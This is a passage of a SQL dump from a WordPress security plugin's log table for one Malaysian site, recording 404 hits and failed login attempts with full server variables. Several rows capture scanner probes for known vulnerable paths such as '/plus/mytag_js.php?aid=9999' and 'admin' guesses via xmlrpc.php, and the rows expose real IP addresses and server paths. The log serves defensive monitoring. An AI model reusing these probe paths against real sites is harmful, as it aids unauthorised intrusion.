20:26:33',35450792,37255248,'https://bintara.com.my/js.php',1,0,'91.203.146.130'),(27739,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"177.36.35.0\";s:11:\"REMOTE_PORT\";s:5:\"58395\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZzlxNPENg31N0h34jAsnAAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570563524.9339\";s:12:\"REQUEST_TIME\";s:10:\"1570563524\";}}','notice','2019-10-08 19:38:46','2019-10-08 19:38:45',35036776,36853040,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'177.36.35.0'),(27737,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/4CDC03\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"56524\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZzIjekI238VIcUXc6ZffAAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570556046.0631\";s:12:\"REQUEST_TIME\";s:10:\"1570556046\";}}','notice','2019-10-08 17:34:10','2019-10-08 17:34:06',35425888,37240736,'https://bintara.com.my/?page_id=18/contact.php',1,0,'94.249.167.197'),(27738,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:36:\"/wp-includes/classkit_method_add.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/wp-includes/classkit_method_add.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:36:\"/wp-includes/classkit_method_add.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZzS0iUSIujKLKSEdMxWbAAAAhc\";s:19:\"REDIRECT_SCRIPT_URI\";s:58:\"https://bintara.com.my/wp-includes/classkit_method_add.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:36:\"/wp-includes/classkit_method_add.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZzS0iUSIujKLKSEdMxWbAAAAhc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"77.104.154.195\";s:11:\"REMOTE_PORT\";s:5:\"33912\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:58:\"https://bintara.com.my/wp-includes/classkit_method_add.php\";s:10:\"SCRIPT_URL\";s:36:\"/wp-includes/classkit_method_add.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZzS0iUSIujKLKSEdMxWbAAAAhc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570558674.3326\";s:12:\"REQUEST_TIME\";s:10:\"1570558674\";}}','notice','2019-10-08 18:18:01','2019-10-08 18:17:55',35432536,37238024,'https://bintara.com.my/wp-includes/classkit_method_add.php',1,0,'77.104.154.195'),(27736,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/?page_id=18%2Fcontact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/4CDC03\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:24:\"page_id=18%2Fcontact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"53999\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZzGy7j4m6oQLpF8wcmbcQAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570555595.7355\";s:12:\"REQUEST_TIME\";s:10:\"1570555595\";}}','notice','2019-10-08 17:26:38','2019-10-08 17:26:36',35513256,37320376,'https://bintara.com.my/?page_id=18%2Fcontact.php',1,0,'94.249.167.197'),(27733,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=9999\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"165.65.40.131\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=e3a29668b1c330a9bbd848ed5d831242\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"165.65.40.131\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydqMC1sJTsX3mg7G4JSQAAAAc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydqMC1sJTsX3mg7G4JSQAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydqMC1sJTsX3mg7G4JSQAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"56451\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydqMC1sJTsX3mg7G4JSQAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570545064.1929\";s:12:\"REQUEST_TIME\";s:10:\"1570545064\";}}','notice','2019-10-08 14:31:05','2019-10-08 14:31:04',35058736,36865152,'https://bintara.com.my/plus/mytag_js.php?aid=9999',1,0,'165.65.40.131'),(27734,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.136.178\";s:11:\"REMOTE_PORT\";s:5:\"53738\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyhW8C1sJTsX3mg7G4JjwAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570546011.627\";s:12:\"REQUEST_TIME\";s:10:\"1570546011\";}}','notice','2019-10-08 14:46:54','2019-10-08 14:46:51',35420784,37233616,'https://bintara.com.my/?page_id=18',1,0,'108.161.136.178'),(27735,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/4CDC03\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"58320\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyvRA2kDY4OaDEjy56BSQAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570549572.1858\";s:12:\"REQUEST_TIME\";s:10:\"1570549572\";}}','notice','2019-10-08 15:46:15','2019-10-08 15:46:12',35511440,37317968,'https://bintara.com.my/?page_id=18',1,0,'94.249.167.197'),(24022,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"35594\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Gqgavjo3v4tJT4rvkuAAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568622250.9214\";s:12:\"REQUEST_TIME\";s:10:\"1568622250\";}}','notice','2019-09-16 08:24:12','2019-09-16 08:24:11',17738704,19231632,'https://bintara.com.my/wp-login.php',1,0,'188.213.19.83'),(24021,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"56043\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9EEwavjo3v4tJT4rvjMgAAAJc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568621587.3913\";s:12:\"REQUEST_TIME\";s:10:\"1568621587\";}}','notice','2019-09-16 08:13:09','2019-09-16 